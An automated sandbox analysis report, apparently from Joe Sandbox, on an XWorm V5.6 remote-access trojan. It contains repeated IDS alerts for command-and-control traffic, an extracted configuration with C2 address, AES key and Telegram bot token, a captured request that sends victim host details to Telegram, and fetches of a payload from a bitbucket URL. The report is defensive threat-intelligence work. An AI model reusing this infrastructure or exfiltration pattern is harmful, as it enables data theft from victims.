2025-03-16T01:40:44.775260+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.887501+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.009884+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.129161+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.329258+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.452618+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.556768+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.665947+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.775587+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.884864+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.994115+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.103549+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.221475+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.337784+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.447476+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.556652+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.665982+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.778348+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.884699+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.994187+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.103872+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.213018+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.322278+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.431544+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.540971+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.650569+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.759900+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.876108+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.979504+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.089819+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.197411+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.306850+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.416053+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.528325+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.635038+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.744342+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.866459+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.962850+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.073920+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.208799+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.322189+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.431526+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.561526+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.666221+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.775447+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.885130+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.994161+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.103501+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.212919+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.346469+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.431608+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.548872+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.650369+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.759863+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.869083+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.978618+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.088097+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.197215+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.306799+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.400243+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.494071+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.591118+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.681595+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.790955+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.884829+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.978607+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.072422+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.165999+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.259733+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.353728+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.447285+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.541745+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.634842+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.728624+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.823961+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.915912+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.010067+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.103503+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.197188+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.294615+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.384821+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.478528+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.572420+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.669779+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.760407+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.885849+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.979951+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.072958+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.165849+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.259840+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.353534+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.447250+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.540910+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.634812+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-16T01:40:20.281171+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.8	49684	38.68.49.150	7777	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-16T01:40:13.567618+0100	2853191	1	Malware Command and Control Activity Detected	38.68.49.150	7777	192.168.2.8	49684	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-16T01:40:13.216579+0100	2853192	1	Malware Command and Control Activity Detected	192.168.2.8	49684	38.68.49.150	7777	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-16T01:40:05.104185+0100	1810007	1	Potentially Bad Traffic	192.168.2.8	49683	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000003.00000002.1455196858.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["38.68.49.150"], "Port": 7777, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8", "Telegram Chatid": "-4763076882", "Version": "XWorm V5.6"}
Source: RegAsm.exe.5384.3.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe

ReversingLabs: Detection: 33%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Virustotal: Detection: 39%			Perma Link
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	ReversingLabs: Detection: 33%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 38.68.49.150
Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 7777
Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: USB.exe

Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.8:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.8:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.8:49692 version: TLS 1.2

Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002E895D FindFirstFileExW,		0_2_002E895D
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CE895D FindFirstFileExW,		2_2_00CE895D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 0674F42Dh	3_2_0674EEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 0674F43Fh	3_2_0674EEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 0674FDF0h	3_2_0674F6C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 0674FDF0h	3_2_0674F6C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	3_2_07B2A6DC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.8:49686 -> 38.68.49.150:7777
Source: Network traffic	Suricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.8:49684 -> 38.68.49.150:7777
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49686 -> 38.68.49.150:7777
Source: Network traffic	Suricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 38.68.49.150:7777 -> 192.168.2.8:49684
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49684 -> 38.68.49.150:7777
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 38.68.49.150:7777 -> 192.168.2.8:49684
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49684 -> 38.68.49.150:7777
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 38.68.49.150:7777 -> 192.168.2.8:49684
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49683 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.8:49683 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 38.68.49.150

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.8:49684 -> 38.68.49.150:7777

Source: global traffic

HTTP traffic detected: GET /bot7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8/sendMessage?chat_id=-4763076882&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A78601CBA8DD4C8D8F863%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%204TFRAFLG3%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 185.166.143.48 185.166.143.48
Source: Joe Sandbox View	IP Address: 185.166.143.50 185.166.143.50

Source: Joe Sandbox View

ASN Name: MAJESTIC-HOSTING-01US MAJESTIC-HOSTING-01US

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.201.147
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.63
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150
Source: unknown	TCP traffic detected without corresponding DNS query: 38.68.49.150

Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe

Code function: 2_2_00CCAC00 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,InternetOpenA,FreeLibrary,_strlen,InternetOpenUrlA,FreeLibrary,InternetReadFile,InternetCloseHandle,FreeLibrary,

2_2_00CCAC00

Source: global traffic	HTTP traffic detected: GET /riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecd HTTP/1.1Accept: /User-Agent: Chrome/95.0.4638.54Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /bot7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8/sendMessage?chat_id=-4763076882&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A78601CBA8DD4C8D8F863%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%204TFRAFLG3%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecd HTTP/1.1Accept: /User-Agent: Chrome/95.0.4638.54Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecd HTTP/1.1Accept: /User-Agent: Chrome/95.0.4638.54Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: c.pki.goog

Source: RegAsm.exe, 00000003.00000002.1455196858.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000003.00000002.1455196858.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458491567.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458718699.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458491567.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1455196858.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114239427.0000000000995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegAsm.exe, 00000003.00000002.1455196858.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8/sendMessage?chat_id=-4763
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913163581.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458583330.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.000000000065D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030719769.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
